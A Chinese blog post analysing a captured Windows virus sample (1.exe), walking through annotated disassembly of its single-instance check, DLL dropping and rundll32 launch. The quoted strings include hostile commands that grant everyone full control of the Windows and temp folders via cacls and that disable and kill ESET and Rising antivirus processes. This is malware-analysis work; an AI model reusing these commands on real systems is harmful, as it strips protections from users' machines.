随手捉了个毒来分析

最新推荐文章于 2022-02-25 23:47:59 发布

iteye_10064

最新推荐文章于 2022-02-25 23:47:59 发布

阅读量89

点赞数

文章标签： C C++ C# Windows Security

本来暑假前就以外地感染的这个病毒，不过我的系统装了影子系统就没造成大的损害。将病毒的样本留下来打算分析的，结果一直拖啊拖啊拖到现在。
病毒有三个文件，分别是1.exe、ctfmen.exe以及explorer.exe。先分析1.exe，剩下两个有空在分析。
用PEID查壳，显示“NsPacK V3.7 -> LiuXingPing”。嗯，很好很强大，虽然没听过，不过看名字就知道不是猛壳，秒杀。
[quote]
004013FC E8 FFFBFFFF call 00401000 ; 从系统dll中获取相关函数地址
00401401 BE 68454000 mov esi, 00404568 ; ASCII "907654"
00401406 56 push esi
00401407 FF15 3C304000 call dword ptr [40303C] ; kernel32.GlobalFindAtomA
0040140D 66:85C0 test ax, ax ; 获取全局原子
00401410 0F87 4A0D0000 ja 00402160 ; 不为0则表示病毒已在运行，退出
[/quote]
在一大段无用的对eax的操作后，就到了上面这段代码。只让程序运行一个实例。继续：
[quote]
00401916 66:81BD E8FEFFF>cmp word ptr [ebp-118], 7D7
0040191F 0F86 42010000 jbe 00401A67
00401925 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040192B 56 push esi
0040192C 50 push eax
0040192D FF15 8C454000 call dword ptr [40458C] ; kernel32.GetWindowsDirectoryA
00401933 8B3D 4C304000 mov edi, dword ptr [40304C] ; msvcrt.sprintf
00401939 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040193F 50 push eax
00401940 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401946 68 C0444000 push 004044C0 ; ASCII "cmd /c cacls %s /e /p everyone:f"
0040194B 50 push eax
0040194C FFD7 call edi
0040194E 83C4 0C add esp, 0C
00401951 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401957 53 push ebx
00401958 50 push eax
00401959 FF15 78454000 call dword ptr [404578] ; WinExec(调用cacls更改系统目录的访问权限，下同）
0040195F 8B1D 1C304000 mov ebx, dword ptr [40301C] ; kernel32.GetTempPathA
00401965 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040196B 50 push eax
0040196C 56 push esi
0040196D FFD3 call ebx
0040196F 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401975 50 push eax
00401976 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
0040197C 68 9C444000 push 0040449C ; ASCII "cmd /c cacls ""%s"" /e /p everyone:f"
00401981 50 push eax
00401982 FFD7 call edi
00401984 83C4 0C add esp, 0C
00401987 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
0040198D 6A 00 push 0
0040198F 50 push eax
00401990 FF15 78454000 call dword ptr [404578] ; WinExec(调用cacls更改用户目录临时文件夹的访问权限）
00401996 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040199C 50 push eax
0040199D 56 push esi
0040199E FFD3 call ebx
004019A0 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019A6 50 push eax
004019A7 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019AD 68 74444000 push 00404474 ; ASCII "cmd /c sc config ekrn start= disabled"
004019B2 50 push eax
004019B3 FFD7 call edi
004019B5 83C4 0C add esp, 0C
004019B8 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019BE 6A 00 push 0
004019C0 50 push eax
004019C1 FF15 78454000 call dword ptr [404578] ; WinExec（取消ESET Smart Security反病毒软件的开机启动）
004019C7 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019CD 50 push eax
004019CE 56 push esi
004019CF FFD3 call ebx
004019D1 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019D7 50 push eax
004019D8 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019DE 68 54444000 push 00404454 ; ASCII "cmd /c taskkill /im ekrn.exe /f"
004019E3 50 push eax
004019E4 FFD7 call edi
004019E6 83C4 0C add esp, 0C
004019E9 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019EF 6A 00 push 0
004019F1 50 push eax
004019F2 FF15 78454000 call dword ptr [404578] ; WinExec（杀死ESET Smart Security反病毒软件）
004019F8 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019FE 50 push eax
004019FF 56 push esi
00401A00 FFD3 call ebx
00401A02 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401A08 50 push eax
00401A09 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A0F 68 34444000 push 00404434 ; ASCII "cmd /c taskkill /im egui.exe /f"
00401A14 50 push eax
00401A15 FFD7 call edi
00401A17 83C4 0C add esp, 0C
00401A1A 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A20 6A 00 push 0
00401A22 50 push eax
00401A23 FF15 78454000 call dword ptr [404578] ; WinExec（杀死Eset NOD32 Smart Security3.0主程序）
00401A29 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401A2F 50 push eax
00401A30 56 push esi
00401A31 FFD3 call ebx
00401A33 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401A39 50 push eax
00401A3A 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A40 68 10444000 push 00404410 ; ASCII "cmd /c taskkill /im ScanFrm.exe /f"
00401A45 50 push eax
00401A46 FFD7 call edi
00401A48 83C4 0C add esp, 0C
00401A4B 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A51 6A 00 push 0
00401A53 50 push eax
00401A54 FF15 78454000 call dword ptr [404578] ; WinExec（杀瑞星！）
00401A5A 68 88130000 push 1388
00401A5F FF15 18304000 call dword ptr [403018] ; Sleep（休眠5秒）
00401A65 33DB xor ebx, ebx
00401A67 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401A6D 56 push esi
00401A6E 50 push eax
00401A6F FF15 8C454000 call dword ptr [40458C] ; kernel32.GetWindowsDirectoryA
00401A75 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401A7B 68 FC434000 push 004043FC ; ASCII "\system32\func.dll"
00401A80 50 push eax
00401A81 E8 F4060000 call 0040217A ; jmp 到 msvcrt.strcat
00401A86 66:81BD E8FEFFF>cmp word ptr [ebp-118], 7D7
00401A8F 59 pop ecx
00401A90 59 pop ecx
00401A91 BF F8434000 mov edi, 004043F8 ; ASCII "BIN"
00401A96 76 21 jbe short 00401AB9
00401A98 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401A9E 50 push eax
00401A9F 57 push edi
00401AA0 68 95000000 push 95
00401AA5 E8 9CF6FFFF call 00401146 ; 将资源段附加的func.dll复制到C:\Windows\System32\文件夹下
00401AAA 83C4 0C add esp, 0C
00401AAD 53 push ebx
00401AAE 68 D8434000 push 004043D8 ; ASCII "rundll32.exe func.dll, droqp"
00401AB3 FF15 78454000 call dword ptr [404578] ; WinExec（用rundll32.exe调用func.dll的droqp函数）
00401AB9 8D85 DCFBFFFF lea eax, dword ptr [ebp-424]
00401ABF 56 push esi
00401AC0 50 push eax
00401AC1 53 push ebx
00401AC2 FF15 2C304000 call dword ptr [40302C] ; kernel32.GetModuleFileNameA
00401AC8 68 204E0000 push 4E20
00401ACD FF15 18304000 call dword ptr [403018] ; kernel32.Sleep
00401AD3 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401AD9 56 push esi
00401ADA 50 push eax
00401ADB FF15 24304000 call dword ptr [403024] ; kernel32.GetWindowsDirectoryA
00401AE1 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401AE7 68 CC434000 push 004043CC ; ASCII "\phpi.dll"
00401AEC 50 push eax
00401AED E8 88060000 call 0040217A ; jmp 到 msvcrt.strcat
00401AF2 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401AF8 50 push eax
00401AF9 57 push edi
00401AFA 68 8F000000 push 8F
00401AFF E8 42F6FFFF call 00401146 ; 将资源段附加的phpi.dll复制到C:\Windows\文件夹下
[/quote]
经过一大段重复的调用GetSystemDirectory的调用（我说作者你不烦的么……），到了上面这段代码。释放了一个dll由rundll32.exe来调用，并将droqp函数作为函数入口。然后又释放了一个dll。经过一段重复的调用……到了下面载入的部分
[quote]
00401BCF 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401BD5 50 push eax ; C:\Windows\phpi.dll
00401BD6 FF15 04304000 call dword ptr [403004] ; kernel32.LoadLibraryA
00401BDC 3BC3 cmp eax, ebx
00401BDE 8945 FC mov dword ptr [ebp-4], eax
00401BE1 0F84 79050000 je 00402160
[/quote]
载入完毕后继续无用的代码，到了获取dll中的函数再调用。
[quote]
00401FF2 68 A8404000 push 004040A8 ; ASCII "FF"
00401FF7 FF75 FC push dword ptr [ebp-4]
00401FFA FF15 00304000 call dword ptr [403000] ; kernel32.GetProcAddress
00402000 53 push ebx
00402001 8945 FC mov dword ptr [ebp-4], eax
00402004 FFD7 call edi ; kernel32.GetModuleHandleA
00402006 8D85 04F2FFFF lea eax, dword ptr [ebp-DFC]
0040200C 50 push eax
0040200D 53 push ebx
0040200E 53 push ebx
0040200F FF55 FC call dword ptr [ebp-4] ; 调用FF
[/quote]
关键代码就这些，DLL的分析过几天有空再写orz

iteye_10064

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
随手捉了个毒来分析

本来暑假前就以外地感染的这个病毒，不过我的系统装了影子系统就没造成大的损害。将病毒的样本留下来打算分析的，结果一直拖啊拖啊拖到现在。病毒有三个文件，分别是1.exe、ctfmen.exe以及explorer.exe。先分析1.exe，剩下两个有空在分析。用PEID查壳，显示“NsPacK V3.7 -> LiuXingPing”。嗯，很好很强大，虽然没听过，不过看名...
复制链接

扫一扫